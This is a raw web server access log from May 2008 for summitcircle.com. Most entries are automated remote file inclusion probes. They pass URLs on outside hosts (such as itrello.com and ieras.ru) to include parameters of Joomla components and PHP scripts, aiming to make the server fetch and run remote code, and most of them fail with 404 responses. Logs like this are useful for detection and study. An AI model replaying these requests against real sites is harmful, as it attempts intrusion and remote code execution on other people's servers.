89.31.204.9 - - [18/May/2008:18:59:19 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:59:20 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.31.204.9 - - [18/May/2008:18:59:20 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
195.209.236.71 - - [18/May/2008:18:59:28 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.2.100.138 - - [18/May/2008:19:00:18 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [18/May/2008:19:00:18 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.94.170.50 - - [18/May/2008:19:00:18 -0700] "GET /logs/access.log/index.php?pagina=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
67.19.107.122 - - [18/May/2008:19:00:31 -0700] "GET /logs/access.log/index.php?pagina=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:19:01:18 -0700] "GET /logs/access_070813.log//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:19:01:18 -0700] "GET /logs//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:19:01:26 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:01:33 -0700] "GET /logs/access_071210.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:01:33 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:01:33 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:19:01:36 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.207.131.21 - - [18/May/2008:19:02:35 -0700] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
204.11.238.133 - - [18/May/2008:19:02:48 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:03:40 -0700] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:03:40 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:03:40 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:19:03:45 -0700] "GET /logs/access_070813.log//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:19:03:45 -0700] "GET /logs//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
68.82.97.13 - - [18/May/2008:19:03:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.summitcircle.com"
68.82.97.13 - - [18/May/2008:19:03:46 -0700] "GET / HTTP/1.1" 200 779 "http://forum.skype.com/index.php?showtopic=15405" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.summitcircle.com"
61.220.16.179 - - [18/May/2008:19:03:50 -0700] "GET /logs/index.php?p=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
61.220.16.179 - - [18/May/2008:19:03:50 -0700] "GET /index.php?p=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:04:15 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:04:19 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:04:41 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:04:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:04:41 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:19:04:44 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:19:05:07 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:19:05:07 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:19:05:08 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:05:21 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:05:21 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:05:21 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:06:00 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:06:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:06:00 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:06:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:06:24 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:06:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:06:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:19:07:10 -0700] "GET /logs/access_080127.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.47.239.77 - - [18/May/2008:19:07:11 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.47.239.77 - - [18/May/2008:19:07:12 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.47.239.77 - - [18/May/2008:19:07:12 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:19:07:31 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:19:07:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:19:07:31 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:07:32 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:07:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
205.134.245.2 - - [18/May/2008:19:07:32 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
124.0.71.130 - - [18/May/2008:19:07:41 -0700] "GET /logs/access_071008.log/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
124.0.71.130 - - [18/May/2008:19:07:41 -0700] "GET /index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
124.0.71.130 - - [18/May/2008:19:07:42 -0700] "GET /logs/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.26.18 - - [18/May/2008:19:08:05 -0700] "GET /logs/access_080218.log//Sources/Packages.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.212.224.170 - - [18/May/2008:19:08:18 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.summitcircle.com"
74.55.6.34 - - [18/May/2008:19:08:20 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
74.55.6.34 - - [18/May/2008:19:08:20 -0700] "GET //auction/includes/converter.inc.php?include_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:08:29 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:08:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:08:30 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.212.224.170 - - [18/May/2008:19:08:32 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.summitcircle.com"
202.181.99.12 - - [18/May/2008:19:08:33 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
202.181.99.12 - - [18/May/2008:19:08:33 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
72.30.216.89 - - [18/May/2008:19:08:43 -0700] "GET /logs/access_080210.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
72.47.239.77 - - [18/May/2008:19:08:55 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.47.239.77 - - [18/May/2008:19:09:26 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
67.19.105.42 - - [18/May/2008:19:10:54 -0700] "GET /logs/access_080310.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:11:35 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:11:35 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:11:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.47.201.117 - - [18/May/2008:19:11:39 -0700] "GET //auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
72.47.201.117 - - [18/May/2008:19:11:39 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:11:53 -0700] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:11:53 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.82.99.126 - - [18/May/2008:19:11:53 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
122.201.81.75 - - [18/May/2008:19:12:11 -0700] "GET /logs/access_071008.log/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
122.201.81.75 - - [18/May/2008:19:12:12 -0700] "GET /index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
122.201.81.75 - - [18/May/2008:19:12:12 -0700] "GET /logs/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
125.141.229.10 - - [18/May/2008:19:12:21 -0700] "GET /logs/access_071008.log/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
125.141.229.10 - - [18/May/2008:19:12:22 -0700] "GET /index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
125.141.229.10 - - [18/May/2008:19:12:22 -0700] "GET /logs/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:19:13:38 -0700] "GET /logs/access_080218.log//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:13:47 -0700] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:13:47 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.139.221.64 - - [18/May/2008:19:13:47 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.7.108.240 - - [18/May/2008:19:14:25 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.251.172 - - [18/May/2008:19:14:27 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:14:59 -0700] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:14:59 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:14:59 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:19:15:00 -0700] "GET /logs/access_080218.log//Sources/Packages.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.191.12.23 - - [18/May/2008:19:16:03 -0700] "GET /logs/access_070813.log//Sources/Packages.php?sourcedir=http://america.red-latina.org/suspended.page/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.191.12.23 - - [18/May/2008:19:16:03 -0700] "GET //Sources/Packages.php?sourcedir=http://america.red-latina.org/suspended.page/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.110.12.93 - - [18/May/2008:19:16:04 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.191.12.23 - - [18/May/2008:19:16:08 -0700] "GET /logs//Sources/Packages.php?sourcedir=http://america.red-latina.org/suspended.page/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
208.76.107.242 - - [18/May/2008:19:16:09 -0700] "GET /index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.139.221.64 - - [18/May/2008:19:16:24 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.212.224.170 - - [18/May/2008:19:17:26 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.summitcircle.com"
217.212.224.170 - - [18/May/2008:19:17:27 -0700] "GET /logs/?S=A HTTP/1.0" 200 9073 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.116.150 - - [18/May/2008:19:17:32 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
216.110.12.93 - - [18/May/2008:19:17:46 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:19:17:59 -0700] "GET /logs/access_080204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:19:17:59 -0700] "GET /logs/access_080204.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
200.1.202.61 - - [18/May/2008:19:18:11 -0700] "GET /logs/sub.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
